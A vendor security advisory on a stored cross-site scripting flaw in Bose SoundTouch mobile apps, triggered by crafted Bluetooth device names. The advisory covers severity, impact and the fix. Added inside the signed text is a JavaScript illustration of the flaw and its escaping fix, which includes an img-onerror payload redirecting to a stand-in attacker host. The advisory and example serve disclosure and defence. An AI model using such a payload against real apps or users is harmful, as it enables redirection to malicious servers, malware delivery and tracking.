-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Bose Product Security Advisory

This advisory from Bose is to provide information to users of certain products regarding a security concern that has been identified in one or more of our products. The information contained in this advisory is intended to help customers understand the nature of the security concern, which products are impacted by this issue, and what steps customers may take to avoid the concern.

Security Concern
================

Bose SoundTouch mobile applications for Android and iOS, interface versions 19.1.7 and earlier, contain a persistent (stored) cross-site scripting (XSS) vulnerability when displaying the name of Bluetooth-connected devices in the device status page. This may allow a malicious user to execute arbitrary JavaScript in the context of the mobile application.

Applications potentially affected by this issue include the following versions:

  * Bose SoundTouch mobile application for Android - Interface version 19.1.7 and earlier
  * Bose SoundTouch mobile application for iOS - Interface version 19.1.7 and earlier

Interface update 19.1.9 addresses this issue.

For more detailed information, please see the full report below.

================================================================

Bose Advisory 2018-002
Revision: 1.1
Revision Date: 12 SEP 2018
CVE Identifier: CVE-2018-16143
Summary: Cross-site scripting vulnerability in Bose SoundTouch mobile applications for Android and iOS, interface versions 19.1.7 and earlier
Affected CWEs: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSS v3 Score: 4.6/Medium (CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)

Detailed Description
~~~~~~~~~~~~~~~~~~~~

Bose SoundTouch mobile applications for Android and iOS, interface versions 19.1.7 and earlier, contain a persistent cross-site scripting (XSS) vulnerability when displaying the name of Bluetooth-connected devices in the device status page. The device name is supplied by the peer Bluetooth device and is rendered without being neutralized for the HTML context in which it is displayed (CWE-79).
The impact is context-specific and will depend upon the applications and capabilities of the user's mobile device. An attacker could leverage this vulnerability to trick a user into performing some action, such as visiting an attacker-controlled website for malicious purposes (see below).

For an attacker to successfully cause an impact, the attacker must be able to connect to or pair with a Bose product via Bluetooth using a device with a specially-crafted name, which is then displayed in the Bose SoundTouch application when a user views the status of the Bose product. In a multi-device setup, an attacker connecting to any device in the setup would potentially enable successful exploitation.

How serious is this issue
~~~~~~~~~~~~~~~~~~~~~~~~~

An estimated severity for this issue was calculated using the Common Vulnerability Scoring System (CVSS) v3, an industry standard method of scoring the seriousness of security issues. The estimated severity for this issue has been calculated to be: 4.6/Medium (CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)

What does this mean in practice
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  * A malicious individual who wishes to exploit this issue to cause harm must be within Bluetooth range (around 100 meters / 328 feet) of a user's product. No special skills or tools are required.
  * The user (victim) must run the Bose SoundTouch mobile application, and must view the device status page, to be impacted.
  * If successful exploitation occurs, the impact is initially on the user's mobile device. Attack scenarios include attempting to redirect a user of the product to a malicious server hosted by the attacker to e.g. deliver malware, to track the user based on information set by the attacker, or to attempt to access applications in use on the user's mobile device.
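The rendering mistake behind CWE-79 in this advisory and its fix, as an added example that is not Bose's code and is not taken from the SoundTouch application: a web-based status view that interpolates the Bluetooth device name straight into HTML, beside the same view with the name HTML-encoded first, plus a check that lists which tags in the rendered fragment the template did not put there. The attacker-chosen name, the `attacker.example` host and the function names are constructed for illustration; the 248-byte limit is the Bluetooth Core Specification's maximum length for a user-friendly device name.

```javascript
// Added example, not Bose's code: the stored-XSS pattern described in this
// advisory (CWE-79) and its fix, in the kind of web-based status view a hybrid
// mobile app renders. Names, the attacker host and the payload are constructed.

// Bluetooth Core Specification: a user-friendly device name is at most 248
// bytes of UTF-8, so an attacker's payload must fit in that budget.
const BT_NAME_MAX_BYTES = 248;

function isValidBluetoothName(name) {
  return new TextEncoder().encode(name).length <= BT_NAME_MAX_BYTES;
}

// Constructed attacker-chosen device name. It fits the 248-byte limit and, if
// rendered as markup, redirects the app's web view to the attacker's host,
// which is the "redirect to a malicious server" scenario in the advisory.
const ATTACKER_NAME = "<img src=x onerror=location='//attacker.example'>";

// Vulnerable pattern: the peer-supplied name is concatenated straight into
// HTML, so any markup in it becomes part of the page (CWE-79).
function renderStatusVulnerable(deviceName) {
  return `<div class="status">Connected to: <b>${deviceName}</b></div>`;
}

// Fix: encode the five characters that can change HTML text or attribute
// context before the string reaches the DOM. In a real page, assigning the
// name via element.textContent instead of innerHTML achieves the same thing.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderStatusSafe(deviceName) {
  return `<div class="status">Connected to: <b>${escapeHtml(deviceName)}</b></div>`;
}

// Check: list the tag names present in a rendered fragment. The template
// itself contributes div, b, b, div; anything else came from the input.
function listTags(html) {
  return Array.from(html.matchAll(/<\/?([a-zA-Z][a-zA-Z0-9-]*)/g), (m) => m[1].toLowerCase());
}

const TEMPLATE_TAGS = ["div", "b", "b", "div"];

// True when the rendered output contains tags the template did not put there.
function hasInjectedMarkup(html) {
  const tags = listTags(html);
  return tags.length !== TEMPLATE_TAGS.length || tags.some((t, i) => t !== TEMPLATE_TAGS[i]);
}

console.log("name fits Bluetooth limit:", isValidBluetoothName(ATTACKER_NAME));
console.log("vulnerable output injected:", hasInjectedMarkup(renderStatusVulnerable(ATTACKER_NAME)));
console.log("hardened output injected:  ", hasInjectedMarkup(renderStatusSafe(ATTACKER_NAME)));
```

The same rule applies whether the status page lives in an Android WebView or an iOS WKWebView: a peer-controlled string such as a Bluetooth name is data, and it must reach the page through textContent or an auto-escaping template, never through string concatenation into innerHTML. The name-length budget is small but, as the constructed payload shows, more than enough for a redirect or a beacon to an attacker host.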
Mitigations
~~~~~~~~~~~

Users of the Bose SoundTouch application for Android or iOS will be automatically updated to interface version 19.1.9 (or newer) on their next use of the application.

Credit & References
~~~~~~~~~~~~~~~~~~~

This issue was responsibly disclosed to Bose by an independent security researcher. Bose would like to thank this researcher for working with Bose to investigate and remediate this issue.

Aditya Gujar, www.betterhacker.com

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBAgAGBQJcF9PNAAoJEPneBdGXcm32dv8IAJ3UEM30cSasAflgfGv/a+Fn
LhxUAjfjc6D1TvDdSpJN1aDiNC1A6MaLTI6unTP40+bm8Ypc0Q/hFuETQ4v86OJ2
437G/gQmqDPP1enMZ+eRfFDG1a2GHJ+AJR7NbQfLBc2qkC6YNHX3FbYMhVX7ibp7
W1ul2grKWqaGuVwn0N8+JbK3oo5gcqSr30tjpKJYVQjfB6PM8rYKCPHlXcPQZoQ7
ZxaQXTzWS+WMeAS9eJ8TH1UOCmMufZLE3wzT8AOPU8Mmw6o+FPSnkS4ddILWEQJ3
oiNQptMXyecBvwMRi/WuV/bczrZ2A5LYS4lTbxw4at+H5mw2e/KcKQGmF3DD+ZQ=
=p4Zd
-----END PGP SIGNATURE-----